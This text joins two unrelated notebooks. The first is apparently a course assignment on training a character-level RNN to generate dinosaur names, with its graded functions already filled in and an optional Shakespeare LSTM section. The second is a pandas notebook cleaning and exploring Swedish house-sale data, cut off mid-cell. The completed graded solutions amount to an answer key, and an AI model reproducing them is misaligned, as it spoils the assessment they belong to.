<caption><center> **Figure 3**: In this picture, we assume the model is already trained. We pass in $x^{\langle 1\rangle} = \vec{0}$ at the first time step, and have the network sample one character at a time. </center></caption>
**Exercise**: Implement the `sample` function below to sample characters. You need to carry out 4 steps:
- **Step 1**: Input the "dummy" vector of zeros $x^{\langle 1 \rangle} = \vec{0}$.
- This is the default input before we've generated any characters.
We also set $a^{\langle 0 \rangle} = \vec{0}$
- **Step 2**: Run one step of forward propagation to get $a^{\langle 1 \rangle}$ and $\hat{y}^{\langle 1 \rangle}$. Here are the equations:
hidden state:
$$ a^{\langle t+1 \rangle} = \tanh(W_{ax} x^{\langle t+1 \rangle } + W_{aa} a^{\langle t \rangle } + b)\tag{1}$$
activation:
$$ z^{\langle t + 1 \rangle } = W_{ya} a^{\langle t + 1 \rangle } + b_y \tag{2}$$
prediction:
$$ \hat{y}^{\langle t+1 \rangle } = softmax(z^{\langle t + 1 \rangle })\tag{3}$$
- Details about $\hat{y}^{\langle t+1 \rangle }$:
- Note that $\hat{y}^{\langle t+1 \rangle }$ is a (softmax) probability vector (its entries are between 0 and 1 and sum to 1).
- $\hat{y}^{\langle t+1 \rangle}_i$ represents the probability that the character indexed by "i" is the next character.
- We have provided a `softmax()` function that you can use.
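Equations (1)-(3) in plain numpy, with a numerically stable softmax standing in for the provided utility (the shapes and seed here are arbitrary):

```python
import numpy as np

def softmax(z):
    e = np.exp(z - z.max())        # subtract the max for numerical stability
    return e / e.sum()

np.random.seed(1)
n_a, vocab_size = 4, 6
Wax = np.random.randn(n_a, vocab_size)
Waa = np.random.randn(n_a, n_a)
Wya = np.random.randn(vocab_size, n_a)
b, by = np.zeros((n_a, 1)), np.zeros((vocab_size, 1))

x = np.zeros((vocab_size, 1))      # dummy first input
a_prev = np.zeros((n_a, 1))
a = np.tanh(np.dot(Wax, x) + np.dot(Waa, a_prev) + b)   # equation (1)
y_hat = softmax(np.dot(Wya, a) + by)                    # equations (2)-(3)
```

With zero input, zero initial state and zero biases, the output distribution is uniform, as expected.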
#### Additional Hints
- $x^{\langle 1 \rangle}$ is `x` in the code. When creating the one-hot vector, make a numpy array of zeros, with the number of rows equal to the number of unique characters, and the number of columns equal to one. It's a 2D and not a 1D array.
- $a^{\langle 0 \rangle}$ is `a_prev` in the code. It is a numpy array of zeros, where the number of rows is $n_{a}$, and number of columns is 1. It is a 2D array as well. $n_{a}$ is retrieved by getting the number of columns in $W_{aa}$ (the numbers need to match in order for the matrix multiplication $W_{aa}a^{\langle t \rangle}$ to work).
- [numpy.dot](https://docs.scipy.org/doc/numpy/reference/generated/numpy.dot.html)
- [numpy.tanh](https://docs.scipy.org/doc/numpy/reference/generated/numpy.tanh.html)
#### Using 2D arrays instead of 1D arrays
* You may be wondering why we emphasize that $x^{\langle 1 \rangle}$ and $a^{\langle 0 \rangle}$ are 2D arrays and not 1D vectors.
* For matrix multiplication in numpy, if we multiply a 2D matrix with a 1D vector, we end up with a 1D array.
* This becomes a problem when we add two arrays where we expected them to have the same shape.
* When two arrays with a different number of dimensions are added together, Python "broadcasts" one across the other.
* Here is some sample code that shows the difference between using a 1D and 2D array.
```
import numpy as np
matrix1 = np.array([[1,1],[2,2],[3,3]]) # (3,2)
matrix2 = np.array([[0],[0],[0]]) # (3,1)
vector1D = np.array([1,1]) # (2,)
vector2D = np.array([[1],[1]]) # (2,1)
print("matrix1 \n", matrix1,"\n")
print("matrix2 \n", matrix2,"\n")
print("vector1D \n", vector1D,"\n")
print("vector2D \n", vector2D)
print("Multiply 2D and 1D arrays: result is a 1D array\n",
np.dot(matrix1,vector1D))
print("Multiply 2D and 2D arrays: result is a 2D array\n",
np.dot(matrix1,vector2D))
print("Adding (3 x 1) vector to a (3 x 1) vector is a (3 x 1) vector\n",
"This is what we want here!\n",
np.dot(matrix1,vector2D) + matrix2)
print("Adding a (3,) vector to a (3 x 1) vector\n",
"broadcasts the 1D array across the second dimension\n",
"Not what we want here!\n",
np.dot(matrix1,vector1D) + matrix2
)
```
- **Step 3**: Sampling:
- Now that we have $y^{\langle t+1 \rangle}$, we want to select the next letter in the dinosaur name. If we select the most probable, the model will always generate the same result given a starting letter.
- To make the results more interesting, we will use np.random.choice to select a next letter that is likely, but not always the same.
- Sampling is the selection of a value from a group of values, where each value has a probability of being picked.
- Sampling allows us to generate random sequences of values.
- Pick the next character's index according to the probability distribution specified by $\hat{y}^{\langle t+1 \rangle }$.
- This means that if $\hat{y}^{\langle t+1 \rangle }_i = 0.16$, you will pick the index "i" with 16% probability.
- You can use [np.random.choice](https://docs.scipy.org/doc/numpy-1.13.0/reference/generated/numpy.random.choice.html).
Example of how to use `np.random.choice()`:
```python
np.random.seed(0)
probs = np.array([0.1, 0.0, 0.7, 0.2])
idx = np.random.choice([0, 1, 2, 3], p = probs)
```
- This means that you will pick the index (`idx`) according to the distribution:
$P(index = 0) = 0.1, P(index = 1) = 0.0, P(index = 2) = 0.7, P(index = 3) = 0.2$.
    - Note that the value passed to `p` should be a 1D vector.
- Also notice that $\hat{y}^{\langle t+1 \rangle}$, which is `y` in the code, is a 2D array.
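You can sanity-check the distribution empirically (illustrative only):

```python
import numpy as np

np.random.seed(0)
probs = np.array([0.1, 0.0, 0.7, 0.2])
draws = np.random.choice(4, size=10_000, p=probs)
# Index 2 should appear roughly 70% of the time; index 1 never appears
freq2 = (draws == 2).mean()
```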
##### Additional Hints
- [range](https://docs.python.org/3/library/functions.html#func-range)
- [numpy.ravel](https://docs.scipy.org/doc/numpy/reference/generated/numpy.ravel.html) takes a multi-dimensional array and returns its contents inside of a 1D vector.
```Python
arr = np.array([[1,2],[3,4]])
print("arr")
print(arr)
print("arr.ravel()")
print(arr.ravel())
```
Output:
```Python
arr
[[1 2]
[3 4]]
arr.ravel()
[1 2 3 4]
```
- Note that `append` is an "in-place" operation. In other words, don't do this:
```Python
fun_hobbies = fun_hobbies.append('learning') ## Doesn't give you what you want
```
- **Step 4**: Update to $x^{\langle t \rangle }$
- The last step to implement in `sample()` is to update the variable `x`, which currently stores $x^{\langle t \rangle }$, with the value of $x^{\langle t + 1 \rangle }$.
- You will represent $x^{\langle t + 1 \rangle }$ by creating a one-hot vector corresponding to the character that you have chosen as your prediction.
- You will then forward propagate $x^{\langle t + 1 \rangle }$ in Step 1 and keep repeating the process until you get a "\n" character, indicating that you have reached the end of the dinosaur name.
##### Additional Hints
- In order to reset `x` before setting it to the new one-hot vector, you'll want to set all the values to zero.
- You can either create a new numpy array: [numpy.zeros](https://docs.scipy.org/doc/numpy/reference/generated/numpy.zeros.html)
- Or fill all values with a single number: [numpy.ndarray.fill](https://docs.scipy.org/doc/numpy/reference/generated/numpy.ndarray.fill.html)
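The reset-then-set pattern looks like this (standalone sketch with a made-up vocabulary size and indices):

```python
import numpy as np

vocab_size = 5
x = np.zeros((vocab_size, 1))
idx = 3                 # index of the character sampled at this step
x[idx] = 1              # one-hot vector for x<t+1>
# On the next iteration, reset before setting the newly sampled index
x.fill(0)
x[1] = 1
```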
```
# GRADED FUNCTION: sample
def sample(parameters, char_to_ix, seed):
"""
Sample a sequence of characters according to a sequence of probability distributions output of the RNN
Arguments:
parameters -- python dictionary containing the parameters Waa, Wax, Wya, by, and b.
char_to_ix -- python dictionary mapping each character to an index.
seed -- used for grading purposes. Do not worry about it.
Returns:
indices -- a list of length n containing the indices of the sampled characters.
"""
# Retrieve parameters and relevant shapes from "parameters" dictionary
Waa, Wax, Wya, by, b = parameters['Waa'], parameters['Wax'], parameters['Wya'], parameters['by'], parameters['b']
vocab_size = by.shape[0]
n_a = Waa.shape[1]
### START CODE HERE ###
# Step 1: Create a zero vector x that can be used as the one-hot vector
# representing the first character (initializing the sequence generation). (≈1 line)
x = np.zeros((vocab_size,1))
# Step 1': Initialize a_prev as zeros (≈1 line)
a_prev = np.zeros((n_a, 1))
# Create an empty list of indices, this is the list which will contain the list of indices of the characters to generate (≈1 line)
indices = []
# idx is the index of the one-hot vector x that is set to 1
# All other positions in x are zero.
# We will initialize idx to -1
idx = -1
# Loop over time-steps t. At each time-step:
# sample a character from a probability distribution
# and append its index (`idx`) to the list "indices".
# We'll stop if we reach 50 characters
# (which should be very unlikely with a well trained model).
# Setting the maximum number of characters helps with debugging and prevents infinite loops.
counter = 0
newline_character = char_to_ix['\n']
while (idx != newline_character and counter != 50):
# Step 2: Forward propagate x using the equations (1), (2) and (3)
a = np.tanh( np.dot(Wax, x) + np.dot(Waa, a_prev) + b )
z = np.dot( Wya, a ) + by
y = softmax( z )
# for grading purposes
np.random.seed( counter + seed )
# Step 3: Sample the index of a character within the vocabulary from the probability distribution y
# (see additional hints above)
idx = np.random.choice(vocab_size, 1, p=y.flatten() )
# Append the index to "indices"
indices.append( idx[0] )
# Step 4: Overwrite the input x with one that corresponds to the sampled index `idx`.
# (see additional hints above)
x = np.zeros((vocab_size,1))
x[idx] = 1
# Update "a_prev" to be "a"
a_prev = a
# for grading purposes
seed += 1
counter +=1
### END CODE HERE ###
if (counter == 50):
indices.append(char_to_ix['\n'])
return indices
np.random.seed(2)
_, n_a = 20, 100
Wax, Waa, Wya = np.random.randn(n_a, vocab_size), np.random.randn(n_a, n_a), np.random.randn(vocab_size, n_a)
b, by = np.random.randn(n_a, 1), np.random.randn(vocab_size, 1)
parameters = {"Wax": Wax, "Waa": Waa, "Wya": Wya, "b": b, "by": by}
indices = sample(parameters, char_to_ix, 0)
print("Sampling:")
print("list of sampled indices:\n", indices)
print("list of sampled characters:\n", [ix_to_char[i] for i in indices])
```
**Expected output:**
```Python
Sampling:
list of sampled indices:
[12, 17, 24, 14, 13, 9, 10, 22, 24, 6, 13, 11, 12, 6, 21, 15, 21, 14, 3, 2, 1, 21, 18, 24, 7, 25, 6, 25, 18, 10, 16, 2, 3, 8, 15, 12, 11, 7, 1, 12, 10, 2, 7, 7, 11, 17, 24, 12, 13, 24, 0]
list of sampled characters:
['l', 'q', 'x', 'n', 'm', 'i', 'j', 'v', 'x', 'f', 'm', 'k', 'l', 'f', 'u', 'o', 'u', 'n', 'c', 'b', 'a', 'u', 'r', 'x', 'g', 'y', 'f', 'y', 'r', 'j', 'p', 'b', 'c', 'h', 'o', 'l', 'k', 'g', 'a', 'l', 'j', 'b', 'g', 'g', 'k', 'q', 'x', 'l', 'm', 'x', '\n']
```
* Please note that over time, if there are updates to the back-end of the Coursera platform (that may update the version of numpy), the actual list of sampled indices and sampled characters may change.
* If you follow the instructions given above and get an output without errors, it's possible the routine is correct even if your output doesn't match the expected output. Submit your assignment to the grader to verify its correctness.
## 3 - Building the language model
It is time to build the character-level language model for text generation.
### 3.1 - Gradient descent
* In this section you will implement a function performing one step of stochastic gradient descent (with clipped gradients).
* You will go through the training examples one at a time, so the optimization algorithm will be stochastic gradient descent.
As a reminder, here are the steps of a common optimization loop for an RNN:
- Forward propagate through the RNN to compute the loss
- Backward propagate through time to compute the gradients of the loss with respect to the parameters
- Clip the gradients
- Update the parameters using gradient descent
**Exercise**: Implement the optimization process (one step of stochastic gradient descent).
The following functions are provided:
```python
def rnn_forward(X, Y, a_prev, parameters):
""" Performs the forward propagation through the RNN and computes the cross-entropy loss.
It returns the loss' value as well as a "cache" storing values to be used in backpropagation."""
...
return loss, cache
def rnn_backward(X, Y, parameters, cache):
""" Performs the backward propagation through time to compute the gradients of the loss with respect
to the parameters. It returns also all the hidden states."""
...
return gradients, a
def update_parameters(parameters, gradients, learning_rate):
""" Updates parameters using the Gradient Descent Update Rule."""
...
return parameters
```
Recall that you previously implemented the `clip` function:
```Python
def clip(gradients, maxValue):
"""Clips the gradients' values between minimum and maximum."""
...
return gradients
```
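Elementwise, the clipping that `clip` applies to each gradient array behaves like `np.clip` (a minimal sketch on a single array):
```Python
import numpy as np

grad = np.array([-7.0, 2.0, 9.0])
clipped = np.clip(grad, -5, 5)   # values outside [-5, 5] are saturated to the bounds
```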
#### parameters
* Note that the weights and biases inside the `parameters` dictionary are being updated by the optimization, even though `parameters` is not one of the returned values of the `optimize` function. The `parameters` dictionary is passed by reference into the function, so changes to this dictionary are making changes to the `parameters` dictionary even when accessed outside of the function.
* Python dictionaries and lists are "pass by reference", which means that if you pass a dictionary into a function and modify the dictionary within the function, this changes that same dictionary (it's not a copy of the dictionary).
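A minimal sketch of this pass-by-reference behavior (the function and dictionary names here are illustrative):
```Python
def scale_values(d, factor):
    for key in d:
        d[key] = d[key] * factor   # mutates the caller's dictionary

weights = {'w': 2.0, 'b': 1.0}
scale_values(weights, 0.5)
print(weights)                     # {'w': 1.0, 'b': 0.5}
```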
```
# GRADED FUNCTION: optimize
def optimize(X, Y, a_prev, parameters, learning_rate = 0.01):
"""
Execute one step of the optimization to train the model.
Arguments:
X -- list of integers, where each integer is a number that maps to a character in the vocabulary.
Y -- list of integers, exactly the same as X but shifted one index to the left.
a_prev -- previous hidden state.
parameters -- python dictionary containing:
Wax -- Weight matrix multiplying the input, numpy array of shape (n_a, n_x)
Waa -- Weight matrix multiplying the hidden state, numpy array of shape (n_a, n_a)
Wya -- Weight matrix relating the hidden-state to the output, numpy array of shape (n_y, n_a)
b -- Bias, numpy array of shape (n_a, 1)
by -- Bias relating the hidden-state to the output, numpy array of shape (n_y, 1)
learning_rate -- learning rate for the model.
Returns:
loss -- value of the loss function (cross-entropy)
gradients -- python dictionary containing:
dWax -- Gradients of input-to-hidden weights, of shape (n_a, n_x)
dWaa -- Gradients of hidden-to-hidden weights, of shape (n_a, n_a)
dWya -- Gradients of hidden-to-output weights, of shape (n_y, n_a)
db -- Gradients of bias vector, of shape (n_a, 1)
dby -- Gradients of output bias vector, of shape (n_y, 1)
a[len(X)-1] -- the last hidden state, of shape (n_a, 1)
"""
### START CODE HERE ###
# Forward propagate through time (≈1 line)
loss, cache = rnn_forward(X, Y, a_prev, parameters)
# Backpropagate through time (≈1 line)
gradients, a = rnn_backward(X, Y, parameters, cache)
# Clip your gradients between -5 (min) and 5 (max) (≈1 line)
gradients = clip(gradients, 5)
# Update parameters (≈1 line)
parameters = update_parameters(parameters, gradients, learning_rate)
### END CODE HERE ###
return loss, gradients, a[len(X)-1]
np.random.seed(1)
vocab_size, n_a = 27, 100
a_prev = np.random.randn(n_a, 1)
Wax, Waa, Wya = np.random.randn(n_a, vocab_size), np.random.randn(n_a, n_a), np.random.randn(vocab_size, n_a)
b, by = np.random.randn(n_a, 1), np.random.randn(vocab_size, 1)
parameters = {"Wax": Wax, "Waa": Waa, "Wya": Wya, "b": b, "by": by}
X = [12,3,5,11,22,3]
Y = [4,14,11,22,25, 26]
loss, gradients, a_last = optimize(X, Y, a_prev, parameters, learning_rate = 0.01)
print("Loss =", loss)
print("gradients[\"dWaa\"][1][2] =", gradients["dWaa"][1][2])
print("np.argmax(gradients[\"dWax\"]) =", np.argmax(gradients["dWax"]))
print("gradients[\"dWya\"][1][2] =", gradients["dWya"][1][2])
print("gradients[\"db\"][4] =", gradients["db"][4])
print("gradients[\"dby\"][1] =", gradients["dby"][1])
print("a_last[4] =", a_last[4])
```
**Expected output:**
```Python
Loss = 126.503975722
gradients["dWaa"][1][2] = 0.194709315347
np.argmax(gradients["dWax"]) = 93
gradients["dWya"][1][2] = -0.007773876032
gradients["db"][4] = [-0.06809825]
gradients["dby"][1] = [ 0.01538192]
a_last[4] = [-1.]
```
### 3.2 - Training the model
* Given the dataset of dinosaur names, we use each line of the dataset (one name) as one training example.
* Every 2000 steps of stochastic gradient descent, you will sample several names to see how the algorithm is doing.
* Remember to shuffle the dataset, so that stochastic gradient descent visits the examples in random order.
**Exercise**: Follow the instructions below and implement `model()`. Each entry `examples[idx]` contains one dinosaur name (a string); the steps below show how to turn it into a training example (X, Y).
##### Set the index `idx` into the list of examples
* Using the for-loop, walk through the shuffled list of dinosaur names in the list "examples".
* If there are 100 examples, and the for-loop increments the index to 100 onwards, think of how you would make the index cycle back to 0, so that we can continue feeding the examples into the model when j is 100, 101, etc.
* Hint: 101 divided by 100 is one with a remainder of 1.
* `%` is the modulus operator in python.
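A quick check of the wrap-around behavior (assuming 100 examples):
```Python
num_examples = 100
wrapped = [j % num_examples for j in (99, 100, 101)]
print(wrapped)   # [99, 0, 1] -- the index cycles back to 0
```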
##### Extract a single example from the list of examples
* `single_example`: use the `idx` index that you set previously to get one word from the list of examples.
##### Convert a string into a list of characters: `single_example_chars`
* `single_example_chars`: A Python string is a sequence of characters, so you can iterate over it directly.
* You can use a list comprehension (recommended over for-loops) to generate a list of characters.
```Python
sentence = 'I love learning'   # avoid naming the variable `str` (it shadows the built-in)
list_of_chars = [c for c in sentence]
print(list_of_chars)
```
```
['I', ' ', 'l', 'o', 'v', 'e', ' ', 'l', 'e', 'a', 'r', 'n', 'i', 'n', 'g']
```
##### Convert list of characters to a list of integers: `single_example_ix`
* Create a list that contains the index numbers associated with each character.
* Use the dictionary `char_to_ix`
* You can combine this with the list comprehension that is used to get a list of characters from a string.
* This is a separate line of code below, to help learners clarify each step in the function.
##### Create the list of input characters: `X`
* `rnn_forward` uses the `None` value as a flag to set the input vector as a zero-vector.
* Prepend the `None` value in front of the list of input characters.
* There is more than one way to prepend a value to a list. One way is to add two lists together: `['a'] + ['b']`
##### Get the integer representation of the newline character `ix_newline`
* `ix_newline`: The newline character signals the end of the dinosaur name.
- get the integer representation of the newline character `'\n'`.
- Use `char_to_ix`
##### Set the list of labels (integer representation of the characters): `Y`
* The goal is to train the RNN to predict the next letter in the name, so the labels are the list of characters that are one time step ahead of the characters in the input `X`.
- For example, `Y[0]` contains the same value as `X[1]`
* The RNN should predict a newline at the last letter so add ix_newline to the end of the labels.
- Append the integer representation of the newline character to the end of `Y`.
- Note that `append` is an in-place operation.
- It might be easier for you to add two lists together.
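Putting the X and Y steps together on a toy example (the character indices and the newline index 0 here are made up for illustration):
```Python
single_example_ix = [3, 1, 4]      # hypothetical character indices for one name
ix_newline = 0                     # assume '\n' maps to index 0
X = [None] + single_example_ix     # [None, 3, 1, 4]
Y = X[1:] + [ix_newline]           # [3, 1, 4, 0] -- shifted left, newline appended
```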
```
# GRADED FUNCTION: model
def model(data, ix_to_char, char_to_ix, num_iterations = 35000, n_a = 50, dino_names = 7, vocab_size = 27):
"""
Trains the model and generates dinosaur names.
Arguments:
data -- text corpus
ix_to_char -- dictionary that maps the index to a character
char_to_ix -- dictionary that maps a character to an index
num_iterations -- number of iterations to train the model for
n_a -- number of units of the RNN cell
dino_names -- number of dinosaur names you want to sample at each iteration.
vocab_size -- number of unique characters found in the text (size of the vocabulary)
Returns:
parameters -- learned parameters
"""
# Retrieve n_x and n_y from vocab_size
n_x, n_y = vocab_size, vocab_size
# Initialize parameters
parameters = initialize_parameters(n_a, n_x, n_y)
# Initialize loss (this is required because we want to smooth our loss)
loss = get_initial_loss(vocab_size, dino_names)
# Build list of all dinosaur names (training examples).
with open("dinos.txt") as f:
examples = f.readlines()
examples = [x.lower().strip() for x in examples]
# Shuffle list of all dinosaur names
np.random.seed(0)
np.random.shuffle(examples)
# Initialize the hidden state of your RNN
a_prev = np.zeros((n_a, 1))
# Optimization loop
for j in range(num_iterations):
### START CODE HERE ###
# Set the index `idx` (see instructions above)
idx = j % len(examples)
# Set the input X (see instructions above)
single_example = examples[idx]
single_example_chars = list(single_example)
single_example_ix = [ char_to_ix[char] for char in single_example_chars ]
X = [None] + single_example_ix
# Set the labels Y (see instructions above)
ix_newline = char_to_ix['\n']
Y = X[1:] + [ix_newline]
# Perform one optimization step: Forward-prop -> Backward-prop -> Clip -> Update parameters
# Choose a learning rate of 0.01
curr_loss, gradients, a_prev = optimize(X, Y, a_prev, parameters, learning_rate = 0.01)
### END CODE HERE ###
# Keep an exponentially smoothed running loss, so the printed loss curve is less noisy.
loss = smooth(loss, curr_loss)
# Every 2000 iterations, generate sample names with sample() to check whether the model is learning.
if j % 2000 == 0:
print('Iteration: %d, Loss: %f' % (j, loss) + '\n')
# The number of dinosaur names to print
seed = 0
for name in range(dino_names):
# Sample indices and print them
sampled_indices = sample(parameters, char_to_ix, seed)
print_sample(sampled_indices, ix_to_char)
seed += 1 # To get the same result (for grading purposes), increment the seed by one.
print('\n')
return parameters
```
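The `smooth` helper used above is provided by the assignment's utilities; a typical implementation is an exponential moving average along these lines (the exact decay factor is an assumption here):
```Python
def smooth_sketch(loss, cur_loss, beta=0.999):
    # the running loss moves only slightly toward the newest observation
    return beta * loss + (1 - beta) * cur_loss

running = smooth_sketch(100.0, 50.0)   # 99.95
```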
Run the following cell. You should observe your model outputting random-looking characters at the first iteration; after a few thousand iterations, it should learn to generate reasonable-looking names.
```
parameters = model(data, ix_to_char, char_to_ix)
```
**Expected Output:**
The output of your model may look different, but it will look something like this:
```Python
Iteration: 34000, Loss: 22.447230
Onyxipaledisons
Kiabaeropa
Lussiamang
Pacaeptabalsaurus
Xosalong
Eiacoteg
Troia
```
## Conclusion
You can see that your algorithm has started to generate plausible dinosaur names towards the end of the training. At first, it was generating random characters, but towards the end you could see dinosaur names with cool endings. Feel free to run the algorithm even longer and play with hyperparameters to see if you can get even better results. Our implementation generated some really cool names like `maconucon`, `marloralus` and `macingsersaurus`. Your model hopefully also learned that dinosaur names tend to end in `saurus`, `don`, `aura`, `tor`, etc.
If your model generates some non-cool names, don't blame the model entirely--not all actual dinosaur names sound cool. (For example, `dromaeosauroides` is an actual dinosaur name and is in the training set.) But this model should give you a set of candidates from which you can pick the coolest!
This assignment used a relatively small dataset so that you could train an RNN quickly on a CPU. Training a model of the English language requires a much bigger dataset and much more computation, and can run for many hours on GPUs. We ran our dinosaur-name model for quite some time, and so far our favorite name is the great, undefeatable, and fierce: Mangosaurus!
<img src="images/mangosaurus.jpeg" style="width:250;height:300px;">
## 4 - Writing like Shakespeare
The rest of this notebook is optional and is not graded, but we hope you'll do it anyway since it's quite fun and informative.
A similar (but more complicated) task is to generate Shakespeare poems. Instead of learning from a dataset of dinosaur names, you can use a collection of Shakespearean poems. Using LSTM cells, you can learn longer-term dependencies that span many characters in the text--e.g., where a character appearing somewhere in a sequence can influence a different character much later in the sequence. These long-term dependencies were less important with dinosaur names, since the names are quite short.
<img src="images/shakespeare.jpg" style="width:500;height:400px;">
<caption><center> Let's become poets! </center></caption>
We have implemented a Shakespeare poem generator with Keras. Run the following cell to load the required packages and models. This may take a few minutes.
```
from __future__ import print_function
from keras.callbacks import LambdaCallback
from keras.models import Model, load_model, Sequential
from keras.layers import Dense, Activation, Dropout, Input, Masking
from keras.layers import LSTM
from keras.utils.data_utils import get_file
from keras.preprocessing.sequence import pad_sequences
from shakespeare_utils import *
import sys
import io
```
To save you some time, we have already trained a model for ~1000 epochs on a collection of Shakespearian poems called [*"The Sonnets"*](shakespeare.txt).
Let's train the model for one more epoch. When it finishes training for an epoch---this will also take a few minutes---you can run `generate_output`, which will prompt you for an input of fewer than 40 characters. The poem will start with your sentence, and our RNN-Shakespeare will complete the rest of the poem for you! For example, try "Forsooth this maketh no sense " (don't enter the quotation marks). Your results may differ depending on whether you include the trailing space--try it both ways, and try other inputs as well.
```
print_callback = LambdaCallback(on_epoch_end=on_epoch_end)
model.fit(x, y, batch_size=128, epochs=1, callbacks=[print_callback])
# Run this cell to try with different inputs without having to re-train the model
generate_output()
```
The RNN-Shakespeare model is very similar to the one you have built for dinosaur names. The only major differences are:
- LSTMs instead of the basic RNN to capture longer-range dependencies
- The model is a deeper, stacked LSTM model (2 layer)
- Using Keras instead of raw Python/numpy to simplify the code
If you want to learn more, you can also check out the Keras Team's text generation implementation on GitHub: https://github.com/keras-team/keras/blob/master/examples/lstm_text_generation.py.
Congratulations on finishing this notebook!
**References**:
- This exercise took inspiration from Andrej Karpathy's implementation: https://gist.github.com/karpathy/d4dee566867f8291f086. To learn more about text generation, also check out Karpathy's [blog post](http://karpathy.github.io/2015/05/21/rnn-effectiveness/).
- For the Shakespearian poem generator, our implementation was based on the implementation of an LSTM text generator by the Keras team: https://github.com/keras-team/keras/blob/master/examples/lstm_text_generation.py
```
import pandas as pd
import numpy as np
df = pd.read_csv('../data/houses/hemnet-190221.csv')
df.head()
df.house_type.value_counts()
# CLEAN THE REGION: fold raw region strings onto canonical neighbourhood names.
# The substitutions are applied in order, so later patterns see the result of
# earlier ones (e.g. GILLBO is folded into ROTEBRO before GILLBERGA becomes GILLBO).
df['region'] = df['region'].str.upper()
region_map = [
    ("VIBY", "VIBY"),
    ("NORRVIKEN", "NORRVIKEN"),
    ("TÖJNAN", "TÖJNAN"),
    ("HELENELUND", "HELENELUND"),
    ("EDSVIKEN", "EDSVIKEN"),
    ("ROTEBRO", "ROTEBRO"),
    ("HÄGGVIK", "HÄGGVIK"),
    ("FÅGELSÅNGEN", "FÅGELSÅNGEN"),
    ("SILVERDAL", "SILVERDAL"),
    ("SJÖBERG", "SJÖBERG"),
    ("TEGELHAGEN", "TEGELHAGEN"),
    ("TÖRNSKOGEN", "TÖRNSKOGEN"),
    ("ROTSUNDA", "ROTEBRO"),
    ("KÄRRDAL", "KÄRRDAL"),
    ("TUREBERG", "TUREBERG"),
    ("CENTRALA SOLLENTUNA", "TUREBERG"),
    ("SOLLENTUNA CENTRUM", "TUREBERG"),
    ("LANDSNORA", "LANDSNORA"),
    ("GILLBO", "ROTEBRO"),
    ("GILBO", "ROTEBRO"),
    ("GILLBERGA", "GILLBO"),
    ("EDSBERG", "EDSBERG"),
    ("EDSÄNGEN", "EDSBERG"),
    ("VAXMORA", "WAXMORA"),
    ("VÄSJÖN", "VÄSJÖN"),
    ("SÖDERSÄTRA", "VÄSJÖN"),
    ("SÖDERSÄTTRA", "VÄSJÖN"),
    ("EDSBACKA", "HÄGGVIK"),
    ("HÄSTHAGEN", "HELENELUND"),
]
for pattern, canonical in region_map:
    df['region'] = np.where(df['region'].str.contains(pattern), canonical, df['region'])
df.region.value_counts()
# Clean the brokers: collapse office-specific names onto the brokerage brand.
broker_names = [
    "Bjurfors", "Fastighetsbyrån", "Mäklarhuset", "Notar", "Susanne Persson",
    "HusmanHagberg", "Svensk Fastighetsförmedling",
    "Länsförsäkringar Fastighetsförmedling", "SkandiaMäklarna", "ERA",
    "Mäklarringen", "Fastighetsmäklarna",
]
for name in broker_names:
    df['broker'] = np.where(df['broker'].str.contains(name), name, df['broker'])
df.broker.value_counts()
df['sup_area'] = np.where(df['sup_area'].isnull(), 0, df['sup_area'])
df['monthly_fee'] = np.where(df['monthly_fee'].isnull(), 0, df['monthly_fee'])
df['price_change_pct'] = np.where(df['price_change_pct'].isnull(), 0, df['price_change_pct'])
df['land_area'] = np.where(df['land_area'].isnull(), 0, df['land_area'])
df
df.isnull().sum()
print(df.count())
df = df[df.address.isnull() == False]
df = df[df.area.isnull() == False]
df[df.rooms.isnull()]
df_copy = df.copy()
df_copy = df_copy[df_copy.rooms.isnull() == False]
df_copy['area_per_room'] = df_copy['area']/df_copy['rooms']
print(np.round(df_copy.area_per_room.mean(),0))
df['rooms'] = np.where(df['rooms'].isnull(), np.round(df['area']/25, 0), df['rooms'])
df.isnull().sum()
df['total_area'] = df['area'] + df['sup_area']
df['price_per_sqm'] = df['price'] / df['area']
df['price_per_tsqm'] = df['price'] / df['total_area']
df['list_price'] = np.round((df['price'] * 100 / (100 + df['price_change_pct']))/1000, 0)*1000
df.head()
df.to_csv('houses_clean.csv',index=False)
df[df.address.str.contains('Marsgränd')]
df[df.address.str.contains('Merkurigränd')]
df[df.address.str.contains('Venusgränd')]
```
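As a sanity check on the `list_price` back-calculation above: a house that sold 5% over asking should map back to its round list price (toy numbers):
```
import numpy as np

price, price_change_pct = 5250000, 5.0
list_price = np.round((price * 100 / (100 + price_change_pct)) / 1000, 0) * 1000
print(list_price)   # 5000000.0
```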
# Exploring
```
%matplotlib inline
import matplotlib.pyplot as plt
def scatter_vs_price(var):
data = pd.concat([df['price'], df[var]], axis=1)
data.plot.scatter(x=var, y='price', ylim=(0,25000000));
plt.show()
#show a scatterplot to see correlation
scatter_vs_price('area')
#area has missing values, drop all rows without area - too important
df = df.dropna(subset=['area'])
#outliers
plt.boxplot(df['area'], 0, 'rD')
plt.show()
#remove any rows with area above 450
df = df[df.area < 450]
scatter_vs_price('area')
```
## Sup area
```
# missing sup_area should mean sup_area = 0
df['sup_area'].fillna(0, inplace=True)
scatter_vs_price('sup_area')
plt.boxplot(df['sup_area'], 0, 'rD')
plt.show()
df[df.sup_area > 200]
```
## Monthly fee
```
# a missing monthly_fee is normal (houses have none) - set to 0
df['monthly_fee'].fillna(0, inplace=True)
scatter_vs_price('monthly_fee')
df['is_condo'] = df['monthly_fee'].apply(lambda fee: 0 if fee == 0 else 1)
```
## Price change percent
```
#missing price_change_pct means no change = 0
df['price_change_pct'].fillna(0, inplace=True)
df = df[df.price_change_pct < 35]
scatter_vs_price('price_change_pct')
```
## Land area
```
# filling missing land_area with 0 seems reasonable
df['land_area'].fillna(0, inplace=True)
df = df[df.land_area < 2800]
scatter_vs_price('land_area')
```
## Rooms
```
scatter_vs_price('rooms')
df.columns
# ...and then we can look at that scatter plot
data = pd.concat([df['rooms'], df['total_area']], axis=1)
data.plot.scatter(x='total_area', y='rooms', ylim=(0,15))
plt.show()
df = df[df.total_area < 500]
df.count()
#we're done with the numerical values, let's check the histograms
df.hist()
plt.show()
```
# Categorical
## House type
```
df['house_type'].describe()
df.house_type.unique()
counts = df['house_type'].value_counts()
counts
fig, ax = plt.subplots()
df['house_type'].value_counts().plot(ax=ax, kind='bar')
plt.show()
```
## Region
```
df['region'].describe()
df.region.unique()
counts = df['region'].value_counts()
counts
```
# Feature Engineering
## Date Sold
```
df['date_sold'] = pd.to_datetime(df['date_sold'])
df['year'] = df['date_sold'].dt.year
df['month'] = df['date_sold'].dt.month
fig, ax = plt.subplots()
df['year'].value_counts().plot(ax=ax, kind='bar')
plt.show()
fig, ax = plt.subplots()
